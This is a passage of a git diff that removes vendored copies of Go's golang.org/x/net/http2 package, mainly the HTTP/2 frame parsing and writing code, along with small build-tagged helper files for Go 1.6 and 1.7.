%d", - fh.StreamID, fr.lastHeaderStream)) - } - } else if fh.Type == FrameContinuation { - return fr.connError(ErrCodeProtocol, fmt.Sprintf("unexpected CONTINUATION for stream %d", fh.StreamID)) - } - - switch fh.Type { - case FrameHeaders, FrameContinuation: - if fh.Flags.Has(FlagHeadersEndHeaders) { - fr.lastHeaderStream = 0 - } else { - fr.lastHeaderStream = fh.StreamID - } - } - - return nil -} - -// A DataFrame conveys arbitrary, variable-length sequences of octets -// associated with a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.1 -type DataFrame struct { - FrameHeader - data []byte -} - -func (f *DataFrame) StreamEnded() bool { - return f.FrameHeader.Flags.Has(FlagDataEndStream) -} - -// Data returns the frame's data octets, not including any padding -// size byte or padding suffix bytes. -// The caller must not retain the returned memory past the next -// call to ReadFrame. -func (f *DataFrame) Data() []byte { - f.checkValid() - return f.data -} - -func parseDataFrame(fc *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if fh.StreamID == 0 { - // DATA frames MUST be associated with a stream. If a - // DATA frame is received whose stream identifier - // field is 0x0, the recipient MUST respond with a - // connection error (Section 5.4.1) of type - // PROTOCOL_ERROR. - return nil, connError{ErrCodeProtocol, "DATA frame with stream ID 0"} - } - f := fc.getDataFrame() - f.FrameHeader = fh - - var padSize byte - if fh.Flags.Has(FlagDataPadded) { - var err error - payload, padSize, err = readByte(payload) - if err != nil { - return nil, err - } - } - if int(padSize) > len(payload) { - // If the length of the padding is greater than the - // length of the frame payload, the recipient MUST - // treat this as a connection error. - // Filed: https://github.com/http2/http2-spec/issues/610 - return nil, connError{ErrCodeProtocol, "pad size larger than data payload"} - } - f.data = payload[:len(payload)-int(padSize)] - return f, nil -} - -var ( - errStreamID = errors.New("invalid stream ID") - errDepStreamID = errors.New("invalid dependent stream ID") - errPadLength = errors.New("pad length too large") - errPadBytes = errors.New("padding bytes must all be zeros unless AllowIllegalWrites is enabled") -) - -func validStreamIDOrZero(streamID uint32) bool { - return streamID&(1<<31) == 0 -} - -func validStreamID(streamID uint32) bool { - return streamID != 0 && streamID&(1<<31) == 0 -} - -// WriteData writes a DATA frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility not to violate the maximum frame size -// and to not call other Write methods concurrently. -func (f *Framer) WriteData(streamID uint32, endStream bool, data []byte) error { - return f.WriteDataPadded(streamID, endStream, data, nil) -} - -// WriteData writes a DATA frame with optional padding. -// -// If pad is nil, the padding bit is not sent. -// The length of pad must not exceed 255 bytes. -// The bytes of pad must all be zero, unless f.AllowIllegalWrites is set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility not to violate the maximum frame size -// and to not call other Write methods concurrently. -func (f *Framer) WriteDataPadded(streamID uint32, endStream bool, data, pad []byte) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - if len(pad) > 0 { - if len(pad) > 255 { - return errPadLength - } - if !f.AllowIllegalWrites { - for _, b := range pad { - if b != 0 { - // "Padding octets MUST be set to zero when sending." - return errPadBytes - } - } - } - } - var flags Flags - if endStream { - flags |= FlagDataEndStream - } - if pad != nil { - flags |= FlagDataPadded - } - f.startWrite(FrameData, flags, streamID) - if pad != nil { - f.wbuf = append(f.wbuf, byte(len(pad))) - } - f.wbuf = append(f.wbuf, data...) - f.wbuf = append(f.wbuf, pad...) - return f.endWrite() -} - -// A SettingsFrame conveys configuration parameters that affect how -// endpoints communicate, such as preferences and constraints on peer -// behavior. -// -// See http://http2.github.io/http2-spec/#SETTINGS -type SettingsFrame struct { - FrameHeader - p []byte -} - -func parseSettingsFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.Flags.Has(FlagSettingsAck) && fh.Length > 0 { - // When this (ACK 0x1) bit is set, the payload of the - // SETTINGS frame MUST be empty. Receipt of a - // SETTINGS frame with the ACK flag set and a length - // field value other than 0 MUST be treated as a - // connection error (Section 5.4.1) of type - // FRAME_SIZE_ERROR. - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID != 0 { - // SETTINGS frames always apply to a connection, - // never a single stream. The stream identifier for a - // SETTINGS frame MUST be zero (0x0). If an endpoint - // receives a SETTINGS frame whose stream identifier - // field is anything other than 0x0, the endpoint MUST - // respond with a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR. - return nil, ConnectionError(ErrCodeProtocol) - } - if len(p)%6 != 0 { - // Expecting even number of 6 byte settings. - return nil, ConnectionError(ErrCodeFrameSize) - } - f := &SettingsFrame{FrameHeader: fh, p: p} - if v, ok := f.Value(SettingInitialWindowSize); ok && v > (1<<31)-1 { - // Values above the maximum flow control window size of 2^31 - 1 MUST - // be treated as a connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR. - return nil, ConnectionError(ErrCodeFlowControl) - } - return f, nil -} - -func (f *SettingsFrame) IsAck() bool { - return f.FrameHeader.Flags.Has(FlagSettingsAck) -} - -func (f *SettingsFrame) Value(s SettingID) (v uint32, ok bool) { - f.checkValid() - buf := f.p - for len(buf) > 0 { - settingID := SettingID(binary.BigEndian.Uint16(buf[:2])) - if settingID == s { - return binary.BigEndian.Uint32(buf[2:6]), true - } - buf = buf[6:] - } - return 0, false -} - -// ForeachSetting runs fn for each setting. -// It stops and returns the first error. -func (f *SettingsFrame) ForeachSetting(fn func(Setting) error) error { - f.checkValid() - buf := f.p - for len(buf) > 0 { - if err := fn(Setting{ - SettingID(binary.BigEndian.Uint16(buf[:2])), - binary.BigEndian.Uint32(buf[2:6]), - }); err != nil { - return err - } - buf = buf[6:] - } - return nil -} - -// WriteSettings writes a SETTINGS frame with zero or more settings -// specified and the ACK bit not set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteSettings(settings ...Setting) error { - f.startWrite(FrameSettings, 0, 0) - for _, s := range settings { - f.writeUint16(uint16(s.ID)) - f.writeUint32(s.Val) - } - return f.endWrite() -} - -// WriteSettingsAck writes an empty SETTINGS frame with the ACK bit set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteSettingsAck() error { - f.startWrite(FrameSettings, FlagSettingsAck, 0) - return f.endWrite() -} - -// A PingFrame is a mechanism for measuring a minimal round trip time -// from the sender, as well as determining whether an idle connection -// is still functional. -// See http://http2.github.io/http2-spec/#rfc.section.6.7 -type PingFrame struct { - FrameHeader - Data [8]byte -} - -func (f *PingFrame) IsAck() bool { return f.Flags.Has(FlagPingAck) } - -func parsePingFrame(_ *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if len(payload) != 8 { - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID != 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - f := &PingFrame{FrameHeader: fh} - copy(f.Data[:], payload) - return f, nil -} - -func (f *Framer) WritePing(ack bool, data [8]byte) error { - var flags Flags - if ack { - flags = FlagPingAck - } - f.startWrite(FramePing, flags, 0) - f.writeBytes(data[:]) - return f.endWrite() -} - -// A GoAwayFrame informs the remote peer to stop creating streams on this connection. -// See http://http2.github.io/http2-spec/#rfc.section.6.8 -type GoAwayFrame struct { - FrameHeader - LastStreamID uint32 - ErrCode ErrCode - debugData []byte -} - -// DebugData returns any debug data in the GOAWAY frame. Its contents -// are not defined. -// The caller must not retain the returned memory past the next -// call to ReadFrame. -func (f *GoAwayFrame) DebugData() []byte { - f.checkValid() - return f.debugData -} - -func parseGoAwayFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.StreamID != 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - if len(p) < 8 { - return nil, ConnectionError(ErrCodeFrameSize) - } - return &GoAwayFrame{ - FrameHeader: fh, - LastStreamID: binary.BigEndian.Uint32(p[:4]) & (1<<31 - 1), - ErrCode: ErrCode(binary.BigEndian.Uint32(p[4:8])), - debugData: p[8:], - }, nil -} - -func (f *Framer) WriteGoAway(maxStreamID uint32, code ErrCode, debugData []byte) error { - f.startWrite(FrameGoAway, 0, 0) - f.writeUint32(maxStreamID & (1<<31 - 1)) - f.writeUint32(uint32(code)) - f.writeBytes(debugData) - return f.endWrite() -} - -// An UnknownFrame is the frame type returned when the frame type is unknown -// or no specific frame type parser exists. -type UnknownFrame struct { - FrameHeader - p []byte -} - -// Payload returns the frame's payload (after the header). It is not -// valid to call this method after a subsequent call to -// Framer.ReadFrame, nor is it valid to retain the returned slice. -// The memory is owned by the Framer and is invalidated when the next -// frame is read. -func (f *UnknownFrame) Payload() []byte { - f.checkValid() - return f.p -} - -func parseUnknownFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - return &UnknownFrame{fh, p}, nil -} - -// A WindowUpdateFrame is used to implement flow control. -// See http://http2.github.io/http2-spec/#rfc.section.6.9 -type WindowUpdateFrame struct { - FrameHeader - Increment uint32 // never read with high bit set -} - -func parseWindowUpdateFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if len(p) != 4 { - return nil, ConnectionError(ErrCodeFrameSize) - } - inc := binary.BigEndian.Uint32(p[:4]) & 0x7fffffff // mask off high reserved bit - if inc == 0 { - // A receiver MUST treat the receipt of a - // WINDOW_UPDATE frame with an flow control window - // increment of 0 as a stream error (Section 5.4.2) of - // type PROTOCOL_ERROR; errors on the connection flow - // control window MUST be treated as a connection - // error (Section 5.4.1). - if fh.StreamID == 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - return nil, streamError(fh.StreamID, ErrCodeProtocol) - } - return &WindowUpdateFrame{ - FrameHeader: fh, - Increment: inc, - }, nil -} - -// WriteWindowUpdate writes a WINDOW_UPDATE frame. -// The increment value must be between 1 and 2,147,483,647, inclusive. -// If the Stream ID is zero, the window update applies to the -// connection as a whole. -func (f *Framer) WriteWindowUpdate(streamID, incr uint32) error { - // "The legal range for the increment to the flow control window is 1 to 2^31-1 (2,147,483,647) octets." - if (incr < 1 || incr > 2147483647) && !f.AllowIllegalWrites { - return errors.New("illegal window increment value") - } - f.startWrite(FrameWindowUpdate, 0, streamID) - f.writeUint32(incr) - return f.endWrite() -} - -// A HeadersFrame is used to open a stream and additionally carries a -// header block fragment. -type HeadersFrame struct { - FrameHeader - - // Priority is set if FlagHeadersPriority is set in the FrameHeader. - Priority PriorityParam - - headerFragBuf []byte // not owned -} - -func (f *HeadersFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *HeadersFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagHeadersEndHeaders) -} - -func (f *HeadersFrame) StreamEnded() bool { - return f.FrameHeader.Flags.Has(FlagHeadersEndStream) -} - -func (f *HeadersFrame) HasPriority() bool { - return f.FrameHeader.Flags.Has(FlagHeadersPriority) -} - -func parseHeadersFrame(_ *frameCache, fh FrameHeader, p []byte) (_ Frame, err error) { - hf := &HeadersFrame{ - FrameHeader: fh, - } - if fh.StreamID == 0 { - // HEADERS frames MUST be associated with a stream. If a HEADERS frame - // is received whose stream identifier field is 0x0, the recipient MUST - // respond with a connection error (Section 5.4.1) of type - // PROTOCOL_ERROR. - return nil, connError{ErrCodeProtocol, "HEADERS frame with stream ID 0"} - } - var padLength uint8 - if fh.Flags.Has(FlagHeadersPadded) { - if p, padLength, err = readByte(p); err != nil { - return - } - } - if fh.Flags.Has(FlagHeadersPriority) { - var v uint32 - p, v, err = readUint32(p) - if err != nil { - return nil, err - } - hf.Priority.StreamDep = v & 0x7fffffff - hf.Priority.Exclusive = (v != hf.Priority.StreamDep) // high bit was set - p, hf.Priority.Weight, err = readByte(p) - if err != nil { - return nil, err - } - } - if len(p)-int(padLength) <= 0 { - return nil, streamError(fh.StreamID, ErrCodeProtocol) - } - hf.headerFragBuf = p[:len(p)-int(padLength)] - return hf, nil -} - -// HeadersFrameParam are the parameters for writing a HEADERS frame. -type HeadersFrameParam struct { - // StreamID is the required Stream ID to initiate. - StreamID uint32 - // BlockFragment is part (or all) of a Header Block. - BlockFragment []byte - - // EndStream indicates that the header block is the last that - // the endpoint will send for the identified stream. Setting - // this flag causes the stream to enter one of "half closed" - // states. - EndStream bool - - // EndHeaders indicates that this frame contains an entire - // header block and is not followed by any - // CONTINUATION frames. - EndHeaders bool - - // PadLength is the optional number of bytes of zeros to add - // to this frame. - PadLength uint8 - - // Priority, if non-zero, includes stream priority information - // in the HEADER frame. - Priority PriorityParam -} - -// WriteHeaders writes a single HEADERS frame. -// -// This is a low-level header writing method. Encoding headers and -// splitting them into any necessary CONTINUATION frames is handled -// elsewhere. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteHeaders(p HeadersFrameParam) error { - if !validStreamID(p.StreamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if p.PadLength != 0 { - flags |= FlagHeadersPadded - } - if p.EndStream { - flags |= FlagHeadersEndStream - } - if p.EndHeaders { - flags |= FlagHeadersEndHeaders - } - if !p.Priority.IsZero() { - flags |= FlagHeadersPriority - } - f.startWrite(FrameHeaders, flags, p.StreamID) - if p.PadLength != 0 { - f.writeByte(p.PadLength) - } - if !p.Priority.IsZero() { - v := p.Priority.StreamDep - if !validStreamIDOrZero(v) && !f.AllowIllegalWrites { - return errDepStreamID - } - if p.Priority.Exclusive { - v |= 1 << 31 - } - f.writeUint32(v) - f.writeByte(p.Priority.Weight) - } - f.wbuf = append(f.wbuf, p.BlockFragment...) - f.wbuf = append(f.wbuf, padZeros[:p.PadLength]...) - return f.endWrite() -} - -// A PriorityFrame specifies the sender-advised priority of a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.3 -type PriorityFrame struct { - FrameHeader - PriorityParam -} - -// PriorityParam are the stream prioritzation parameters. -type PriorityParam struct { - // StreamDep is a 31-bit stream identifier for the - // stream that this stream depends on. Zero means no - // dependency. - StreamDep uint32 - - // Exclusive is whether the dependency is exclusive. - Exclusive bool - - // Weight is the stream's zero-indexed weight. It should be - // set together with StreamDep, or neither should be set. Per - // the spec, "Add one to the value to obtain a weight between - // 1 and 256." - Weight uint8 -} - -func (p PriorityParam) IsZero() bool { - return p == PriorityParam{} -} - -func parsePriorityFrame(_ *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if fh.StreamID == 0 { - return nil, connError{ErrCodeProtocol, "PRIORITY frame with stream ID 0"} - } - if len(payload) != 5 { - return nil, connError{ErrCodeFrameSize, fmt.Sprintf("PRIORITY frame payload size was %d; want 5", len(payload))} - } - v := binary.BigEndian.Uint32(payload[:4]) - streamID := v & 0x7fffffff // mask off high bit - return &PriorityFrame{ - FrameHeader: fh, - PriorityParam: PriorityParam{ - Weight: payload[4], - StreamDep: streamID, - Exclusive: streamID != v, // was high bit set? - }, - }, nil -} - -// WritePriority writes a PRIORITY frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WritePriority(streamID uint32, p PriorityParam) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - if !validStreamIDOrZero(p.StreamDep) { - return errDepStreamID - } - f.startWrite(FramePriority, 0, streamID) - v := p.StreamDep - if p.Exclusive { - v |= 1 << 31 - } - f.writeUint32(v) - f.writeByte(p.Weight) - return f.endWrite() -} - -// A RSTStreamFrame allows for abnormal termination of a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.4 -type RSTStreamFrame struct { - FrameHeader - ErrCode ErrCode -} - -func parseRSTStreamFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if len(p) != 4 { - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID == 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - return &RSTStreamFrame{fh, ErrCode(binary.BigEndian.Uint32(p[:4]))}, nil -} - -// WriteRSTStream writes a RST_STREAM frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteRSTStream(streamID uint32, code ErrCode) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - f.startWrite(FrameRSTStream, 0, streamID) - f.writeUint32(uint32(code)) - return f.endWrite() -} - -// A ContinuationFrame is used to continue a sequence of header block fragments. -// See http://http2.github.io/http2-spec/#rfc.section.6.10 -type ContinuationFrame struct { - FrameHeader - headerFragBuf []byte -} - -func parseContinuationFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.StreamID == 0 { - return nil, connError{ErrCodeProtocol, "CONTINUATION frame with stream ID 0"} - } - return &ContinuationFrame{fh, p}, nil -} - -func (f *ContinuationFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *ContinuationFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagContinuationEndHeaders) -} - -// WriteContinuation writes a CONTINUATION frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteContinuation(streamID uint32, endHeaders bool, headerBlockFragment []byte) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if endHeaders { - flags |= FlagContinuationEndHeaders - } - f.startWrite(FrameContinuation, flags, streamID) - f.wbuf = append(f.wbuf, headerBlockFragment...) - return f.endWrite() -} - -// A PushPromiseFrame is used to initiate a server stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.6 -type PushPromiseFrame struct { - FrameHeader - PromiseID uint32 - headerFragBuf []byte // not owned -} - -func (f *PushPromiseFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *PushPromiseFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagPushPromiseEndHeaders) -} - -func parsePushPromise(_ *frameCache, fh FrameHeader, p []byte) (_ Frame, err error) { - pp := &PushPromiseFrame{ - FrameHeader: fh, - } - if pp.StreamID == 0 { - // PUSH_PROMISE frames MUST be associated with an existing, - // peer-initiated stream. The stream identifier of a - // PUSH_PROMISE frame indicates the stream it is associated - // with. If the stream identifier field specifies the value - // 0x0, a recipient MUST respond with a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - return nil, ConnectionError(ErrCodeProtocol) - } - // The PUSH_PROMISE frame includes optional padding. - // Padding fields and flags are identical to those defined for DATA frames - var padLength uint8 - if fh.Flags.Has(FlagPushPromisePadded) { - if p, padLength, err = readByte(p); err != nil { - return - } - } - - p, pp.PromiseID, err = readUint32(p) - if err != nil { - return - } - pp.PromiseID = pp.PromiseID & (1<<31 - 1) - - if int(padLength) > len(p) { - // like the DATA frame, error out if padding is longer than the body. - return nil, ConnectionError(ErrCodeProtocol) - } - pp.headerFragBuf = p[:len(p)-int(padLength)] - return pp, nil -} - -// PushPromiseParam are the parameters for writing a PUSH_PROMISE frame. -type PushPromiseParam struct { - // StreamID is the required Stream ID to initiate. - StreamID uint32 - - // PromiseID is the required Stream ID which this - // Push Promises - PromiseID uint32 - - // BlockFragment is part (or all) of a Header Block. - BlockFragment []byte - - // EndHeaders indicates that this frame contains an entire - // header block and is not followed by any - // CONTINUATION frames. - EndHeaders bool - - // PadLength is the optional number of bytes of zeros to add - // to this frame. - PadLength uint8 -} - -// WritePushPromise writes a single PushPromise Frame. -// -// As with Header Frames, This is the low level call for writing -// individual frames. Continuation frames are handled elsewhere. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WritePushPromise(p PushPromiseParam) error { - if !validStreamID(p.StreamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if p.PadLength != 0 { - flags |= FlagPushPromisePadded - } - if p.EndHeaders { - flags |= FlagPushPromiseEndHeaders - } - f.startWrite(FramePushPromise, flags, p.StreamID) - if p.PadLength != 0 { - f.writeByte(p.PadLength) - } - if !validStreamID(p.PromiseID) && !f.AllowIllegalWrites { - return errStreamID - } - f.writeUint32(p.PromiseID) - f.wbuf = append(f.wbuf, p.BlockFragment...) - f.wbuf = append(f.wbuf, padZeros[:p.PadLength]...) - return f.endWrite() -} - -// WriteRawFrame writes a raw frame. This can be used to write -// extension frames unknown to this package. -func (f *Framer) WriteRawFrame(t FrameType, flags Flags, streamID uint32, payload []byte) error { - f.startWrite(t, flags, streamID) - f.writeBytes(payload) - return f.endWrite() -} - -func readByte(p []byte) (remain []byte, b byte, err error) { - if len(p) == 0 { - return nil, 0, io.ErrUnexpectedEOF - } - return p[1:], p[0], nil -} - -func readUint32(p []byte) (remain []byte, v uint32, err error) { - if len(p) < 4 { - return nil, 0, io.ErrUnexpectedEOF - } - return p[4:], binary.BigEndian.Uint32(p[:4]), nil -} - -type streamEnder interface { - StreamEnded() bool -} - -type headersEnder interface { - HeadersEnded() bool -} - -type headersOrContinuation interface { - headersEnder - HeaderBlockFragment() []byte -} - -// A MetaHeadersFrame is the representation of one HEADERS frame and -// zero or more contiguous CONTINUATION frames and the decoding of -// their HPACK-encoded contents. -// -// This type of frame does not appear on the wire and is only returned -// by the Framer when Framer.ReadMetaHeaders is set. -type MetaHeadersFrame struct { - *HeadersFrame - - // Fields are the fields contained in the HEADERS and - // CONTINUATION frames. The underlying slice is owned by the - // Framer and must not be retained after the next call to - // ReadFrame. - // - // Fields are guaranteed to be in the correct http2 order and - // not have unknown pseudo header fields or invalid header - // field names or values. Required pseudo header fields may be - // missing, however. Use the MetaHeadersFrame.Pseudo accessor - // method access pseudo headers. - Fields []hpack.HeaderField - - // Truncated is whether the max header list size limit was hit - // and Fields is incomplete. The hpack decoder state is still - // valid, however. - Truncated bool -} - -// PseudoValue returns the given pseudo header field's value. -// The provided pseudo field should not contain the leading colon. -func (mh *MetaHeadersFrame) PseudoValue(pseudo string) string { - for _, hf := range mh.Fields { - if !hf.IsPseudo() { - return "" - } - if hf.Name[1:] == pseudo { - return hf.Value - } - } - return "" -} - -// RegularFields returns the regular (non-pseudo) header fields of mh. -// The caller does not own the returned slice. -func (mh *MetaHeadersFrame) RegularFields() []hpack.HeaderField { - for i, hf := range mh.Fields { - if !hf.IsPseudo() { - return mh.Fields[i:] - } - } - return nil -} - -// PseudoFields returns the pseudo header fields of mh. -// The caller does not own the returned slice. -func (mh *MetaHeadersFrame) PseudoFields() []hpack.HeaderField { - for i, hf := range mh.Fields { - if !hf.IsPseudo() { - return mh.Fields[:i] - } - } - return mh.Fields -} - -func (mh *MetaHeadersFrame) checkPseudos() error { - var isRequest, isResponse bool - pf := mh.PseudoFields() - for i, hf := range pf { - switch hf.Name { - case ":method", ":path", ":scheme", ":authority": - isRequest = true - case ":status": - isResponse = true - default: - return pseudoHeaderError(hf.Name) - } - // Check for duplicates. - // This would be a bad algorithm, but N is 4. - // And this doesn't allocate. - for _, hf2 := range pf[:i] { - if hf.Name == hf2.Name { - return duplicatePseudoHeaderError(hf.Name) - } - } - } - if isRequest && isResponse { - return errMixPseudoHeaderTypes - } - return nil -} - -func (fr *Framer) maxHeaderStringLen() int { - v := fr.maxHeaderListSize() - if uint32(int(v)) == v { - return int(v) - } - // They had a crazy big number for MaxHeaderBytes anyway, - // so give them unlimited header lengths: - return 0 -} - -// readMetaFrame returns 0 or more CONTINUATION frames from fr and -// merge them into into the provided hf and returns a MetaHeadersFrame -// with the decoded hpack values. -func (fr *Framer) readMetaFrame(hf *HeadersFrame) (*MetaHeadersFrame, error) { - if fr.AllowIllegalReads { - return nil, errors.New("illegal use of AllowIllegalReads with ReadMetaHeaders") - } - mh := &MetaHeadersFrame{ - HeadersFrame: hf, - } - var remainSize = fr.maxHeaderListSize() - var sawRegular bool - - var invalid error // pseudo header field errors - hdec := fr.ReadMetaHeaders - hdec.SetEmitEnabled(true) - hdec.SetMaxStringLength(fr.maxHeaderStringLen()) - hdec.SetEmitFunc(func(hf hpack.HeaderField) { - if VerboseLogs && fr.logReads { - fr.debugReadLoggerf("http2: decoded hpack field %+v", hf) - } - if !httplex.ValidHeaderFieldValue(hf.Value) { - invalid = headerFieldValueError(hf.Value) - } - isPseudo := strings.HasPrefix(hf.Name, ":") - if isPseudo { - if sawRegular { - invalid = errPseudoAfterRegular - } - } else { - sawRegular = true - if !validWireHeaderFieldName(hf.Name) { - invalid = headerFieldNameError(hf.Name) - } - } - - if invalid != nil { - hdec.SetEmitEnabled(false) - return - } - - size := hf.Size() - if size > remainSize { - hdec.SetEmitEnabled(false) - mh.Truncated = true - return - } - remainSize -= size - - mh.Fields = append(mh.Fields, hf) - }) - // Lose reference to MetaHeadersFrame: - defer hdec.SetEmitFunc(func(hf hpack.HeaderField) {}) - - var hc headersOrContinuation = hf - for { - frag := hc.HeaderBlockFragment() - if _, err := hdec.Write(frag); err != nil { - return nil, ConnectionError(ErrCodeCompression) - } - - if hc.HeadersEnded() { - break - } - if f, err := fr.ReadFrame(); err != nil { - return nil, err - } else { - hc = f.(*ContinuationFrame) // guaranteed by checkFrameOrder - } - } - - mh.HeadersFrame.headerFragBuf = nil - mh.HeadersFrame.invalidate() - - if err := hdec.Close(); err != nil { - return nil, ConnectionError(ErrCodeCompression) - } - if invalid != nil { - fr.errDetail = invalid - if VerboseLogs { - log.Printf("http2: invalid header: %v", invalid) - } - return nil, StreamError{mh.StreamID, ErrCodeProtocol, invalid} - } - if err := mh.checkPseudos(); err != nil { - fr.errDetail = err - if VerboseLogs { - log.Printf("http2: invalid pseudo headers: %v", err) - } - return nil, StreamError{mh.StreamID, ErrCodeProtocol, err} - } - return mh, nil -} - -func summarizeFrame(f Frame) string { - var buf bytes.Buffer - f.Header().writeDebug(&buf) - switch f := f.(type) { - case *SettingsFrame: - n := 0 - f.ForeachSetting(func(s Setting) error { - n++ - if n == 1 { - buf.WriteString(", settings:") - } - fmt.Fprintf(&buf, " %v=%v,", s.ID, s.Val) - return nil - }) - if n > 0 { - buf.Truncate(buf.Len() - 1) // remove trailing comma - } - case *DataFrame: - data := f.Data() - const max = 256 - if len(data) > max { - data = data[:max] - } - fmt.Fprintf(&buf, " data=%q", data) - if len(f.Data()) > max { - fmt.Fprintf(&buf, " (%d bytes omitted)", len(f.Data())-max) - } - case *WindowUpdateFrame: - if f.StreamID == 0 { - buf.WriteString(" (conn)") - } - fmt.Fprintf(&buf, " incr=%v", f.Increment) - case *PingFrame: - fmt.Fprintf(&buf, " ping=%q", f.Data[:]) - case *GoAwayFrame: - fmt.Fprintf(&buf, " LastStreamID=%v ErrCode=%v Debug=%q", - f.LastStreamID, f.ErrCode, f.debugData) - case *RSTStreamFrame: - fmt.Fprintf(&buf, " ErrCode=%v", f.ErrCode) - } - return buf.String() -} diff --git a/vendor/golang.org/x/net/http2/go16.go b/vendor/golang.org/x/net/http2/go16.go deleted file mode 100644 index 00b2e9e3..00000000 --- a/vendor/golang.org/x/net/http2/go16.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.6 - -package http2 - -import ( - "net/http" - "time" -) - -func transportExpectContinueTimeout(t1 *http.Transport) time.Duration { - return t1.ExpectContinueTimeout -} diff --git a/vendor/golang.org/x/net/http2/go17.go b/vendor/golang.org/x/net/http2/go17.go deleted file mode 100644 index 47b7fae0..00000000 --- a/vendor/golang.org/x/net/http2/go17.go +++ /dev/null @@ -1,106 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.7 - -package http2 - -import ( - "context" - "net" - "net/http" - "net/http/httptrace" - "time" -) - -type contextContext interface { - context.Context -} - -func serverConnBaseContext(c net.Conn, opts *ServeConnOpts) (ctx contextContext, cancel func()) { - ctx, cancel = context.WithCancel(context.Background()) - ctx = context.WithValue(ctx, http.LocalAddrContextKey, c.LocalAddr()) - if hs := opts.baseConfig(); hs != nil { - ctx = context.WithValue(ctx, http.ServerContextKey, hs) - } - return -} - -func contextWithCancel(ctx contextContext) (_ contextContext, cancel func()) { - return context.WithCancel(ctx) -} - -func requestWithContext(req *http.Request, ctx contextContext) *http.Request { - return req.WithContext(ctx) -} - -type clientTrace httptrace.ClientTrace - -func reqContext(r *http.Request) context.Context { return r.Context() } - -func (t *Transport) idleConnTimeout() time.Duration { - if t.t1 != nil { - return t.t1.IdleConnTimeout - } - return 0 -} - -func setResponseUncompressed(res *http.Response) { res.Uncompressed = true } - -func traceGotConn(req *http.Request, cc *ClientConn) { - trace := httptrace.ContextClientTrace(req.Context()) - if trace == nil || trace.GotConn == nil { - return - } - ci := httptrace.GotConnInfo{Conn: cc.tconn} - cc.mu.Lock() - ci.Reused = cc.nextStreamID > 1 - ci.WasIdle = len(cc.streams) == 0 && ci.Reused - if ci.WasIdle && !cc.lastActive.IsZero() { - ci.IdleTime = time.Now().Sub(cc.lastActive) - } - cc.mu.Unlock() - - trace.GotConn(ci) -} - -func traceWroteHeaders(trace *clientTrace) { - if trace != nil && trace.WroteHeaders != nil { - trace.WroteHeaders() - } -} - -func traceGot100Continue(trace *clientTrace) { - if trace != nil && trace.Got100Continue != nil { - trace.Got100Continue() - } -} - -func traceWait100Continue(trace *clientTrace) { - if trace != nil && trace.Wait100Continue != nil { - trace.Wait100Continue() - } -} - -func traceWroteRequest(trace *clientTrace, err error) { - if trace != nil && trace.WroteRequest != nil { - trace.WroteRequest(httptrace.WroteRequestInfo{Err: err}) - } -} - -func traceFirstResponseByte(trace *clientTrace) { - if trace != nil && trace.GotFirstResponseByte != nil { - trace.GotFirstResponseByte() - } -} - -func requestTrace(req *http.Request) *clientTrace { - trace := httptrace.ContextClientTrace(req.Context()) - return (*clientTrace)(trace) -} - -// Ping sends a PING frame to the server and waits for the ack. -func (cc *ClientConn) Ping(ctx context.Context) error { - return 